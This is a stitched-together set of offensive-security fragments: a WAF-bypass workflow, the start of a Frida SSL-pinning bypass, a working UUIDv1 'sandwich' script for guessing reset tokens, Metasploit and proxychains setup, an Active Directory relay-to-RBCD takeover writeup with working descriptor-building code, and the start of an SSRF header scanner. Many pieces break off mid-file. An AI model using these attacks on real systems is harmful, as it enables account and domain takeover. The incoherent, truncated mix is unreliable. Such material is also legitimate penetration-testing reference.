{
  "description": "Bypass WAFs with 8KB Padding.",
  "edition": 2,
  "graph": {
    "edges": [
      {
        "source": {
          "exec_alias": "exec",
          "node_id": 2
        },
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that SSL pinning can be implemented in custom ways; sometimes you will need to reverse the app with Ghidra, IDA or a similar tool to find the check.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!!
#!/usr/bin/env python3
import argparse
import datetime
import re
import sys
import uuid
###############################################################################
# Based off of Daniel Thatcher's guid tool
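The two operations a tool of this kind needs are pulling the timestamp, clock sequence and node out of a version-1 UUID, and enumerating every UUID the same generator could have minted between two observed ones (the "sandwich" attack against v1 tokens such as password-reset links). The block below is an added example of both, written here for illustration; it is not the script above and not Daniel Thatcher's code. All UUIDs in it are constructed from fixed field values.

```python
import datetime
import uuid

# Gap between the UUID epoch (1582-10-15) and the Unix epoch, in 100-ns ticks.
UUID_EPOCH_OFFSET = 0x01B21DD213814000
UUID_EPOCH = datetime.datetime(1582, 10, 15)


def make_uuid1(ticks, clock_seq, node):
    """Assemble a version-1 UUID from its raw fields.

    ticks:     60-bit count of 100-ns intervals since 1582-10-15
    clock_seq: 14-bit clock sequence
    node:      48-bit node id (normally the generator's MAC address)
    """
    time_low = ticks & 0xFFFFFFFF
    time_mid = (ticks >> 32) & 0xFFFF
    time_hi_version = ((ticks >> 48) & 0x0FFF) | 0x1000       # version nibble = 1
    clock_seq_hi_variant = 0x80 | ((clock_seq >> 8) & 0x3F)   # RFC 4122 variant bits
    clock_seq_low = clock_seq & 0xFF
    return uuid.UUID(fields=(time_low, time_mid, time_hi_version,
                             clock_seq_hi_variant, clock_seq_low, node))


def uuid1_timestamp(u):
    """Wall-clock time (UTC) encoded in a v1 UUID, truncated to microseconds."""
    if u.version != 1:
        raise ValueError("not a version-1 UUID: %s" % u)
    return UUID_EPOCH + datetime.timedelta(microseconds=u.time // 10)


def uuid1_sandwich(first, last, max_candidates=100000):
    """Every v1 UUID the same generator could have produced strictly between
    `first` and `last`.  If an attacker obtains one token minted just before
    and one just after the victim's, the victim's token is in this list."""
    for u in (first, last):
        if u.version != 1:
            raise ValueError("not a version-1 UUID: %s" % u)
    if first.node != last.node or first.clock_seq != last.clock_seq:
        raise ValueError("UUIDs come from different generators (node/clock_seq differ)")
    lo, hi = sorted((first.time, last.time))
    if hi - lo - 1 > max_candidates:
        raise ValueError("gap of %d ticks exceeds max_candidates" % (hi - lo - 1))
    return [make_uuid1(t, first.clock_seq, first.node) for t in range(lo + 1, hi)]


if __name__ == "__main__":
    # Constructed pair: same node and clock sequence, four ticks apart.
    node = 0x001122334455
    before = make_uuid1(UUID_EPOCH_OFFSET + 1000, 7, node)
    after = make_uuid1(UUID_EPOCH_OFFSET + 1004, 7, node)
    print("before:", before, uuid1_timestamp(before))
    for cand in uuid1_sandwich(before, after):
        print("candidate:", cand)
```

In practice the tick gap between two tokens minted seconds apart is in the tens of millions, so a real run feeds the candidate list straight into the target endpoint rather than printing it; `max_candidates` is there to stop an accidental multi-hour enumeration when the two UUIDs turn out not to be adjacent.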
This method installs Metasploit from the official macOS installer found at https://osx.metasploit.com/metasploitframework-latest.pkg
- Download the installer from https://osx.metasploit.com/metasploitframework-latest.pkg
- Run the installer.
- Gatekeeper will block it from running.
- Go to System Preferences -> Security & Privacy and choose "Open Anyway".
- The installer will start.
- At some point you will have to type your password to give the installer elevated privileges to continue.
{
  "builders": [],
  "provisioners": [
    {
      "type": "file",
      "source": "./configs",
      "destination": "/tmp/configs"
    },
    {
      "execute_command": "chmod +x {{ .Path }}; {{ .Vars }} sudo -E sh '{{ .Path }}'",
# install
sudo apt-get install proxychains
sudo apt-get install tor
# then update /etc/proxychains.conf and /etc/tor/torrc with the given config
# restart the tor service (the service name comes before the action)
sudo service tor restart
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS to configure RBCD (resource-based constrained delegation) on the victim's computer object.
- Taking over the host via RBCD.
The caveat is that the WebClient service does not start automatically at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely, which I cover in a section below.
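On the wire, "configuring RBCD" means writing a security descriptor into the victim computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute whose DACL grants the attacker-controlled computer account full control. The block below is an added example (mine, not code from the post above or from any relay tool, and not dependent on impacket) that builds that self-relative descriptor in pure Python, parses one back, and appends an entry when the attribute already holds a value, which is what a careful relay does so that pre-existing delegations are not clobbered. The SIDs are constructed; the owner/group SID and the 0x000F01FF mask follow the convention the common tooling uses.

```python
import struct

FULL_CONTROL = 0x000F01FF               # access mask the common tools write for RBCD
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"  # owner/group of the new descriptor (tool convention)


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into binary SID layout (little-endian sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("malformed SID: %s" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf, off=0):
    """Decode a binary SID at buf[off:]; returns (sid_string, bytes_consumed)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    sid = "S-%d-%d" % (revision, authority)
    if subs:
        sid += "-" + "-".join(str(s) for s in subs)
    return sid, 8 + 4 * count


def _ace(sid):
    """ACCESS_ALLOWED_ACE: type, flags, size, mask, then the trustee SID."""
    sid_b = sid_to_bytes(sid)
    return struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b


def build_rbcd_sd(allowed):
    """Self-relative SECURITY_DESCRIPTOR: owner, group, no SACL, and a DACL with
    one full-control ACCESS_ALLOWED_ACE per SID in `allowed`."""
    aces = b"".join(_ace(s) for s in allowed)
    # ACL header: revision 4 (ACL_REVISION_DS), sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    group = owner
    off_owner = 20                       # fixed 20-byte descriptor header
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # OffsetSacl = 0
    return header + owner + group + dacl


def allowed_sids(sd):
    """SIDs granted by ACCESS_ALLOWED_ACEs in the DACL of a self-relative descriptor."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, pos + 8)[0])
        pos += ace_size
    return sids


def add_rbcd_entry(existing_sd, new_sid):
    """Descriptor to write back: every SID already allowed, plus new_sid.
    Pass b'' or None when the attribute is currently empty."""
    current = allowed_sids(existing_sd) if existing_sd else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_sd(current)


if __name__ == "__main__":
    # Constructed SIDs standing in for two attacker-controlled computer accounts.
    sd = build_rbcd_sd(["S-1-5-21-1-2-3-1105"])
    print(len(sd), "bytes:", sd.hex())
    print(allowed_sids(add_rbcd_entry(sd, "S-1-5-21-1-2-3-1106")))
```

The 96-byte blob the first call produces is exactly what the relay sends in the LDAP modify; reading it back with `allowed_sids` is also how a defender can audit computer objects for unexpected delegation entries, since the same attribute is what shows up when a host has been targeted this way.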
'''
Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written
in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer
runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It
does not have the metadata parsing capabilities that CeWL does, but it more than makes up for it in
convenience.
The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written
in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python,
making it "way cooler".
#https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/ssrf.py
import aiohttp
import asyncio
import urllib3
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
injectable_headers = [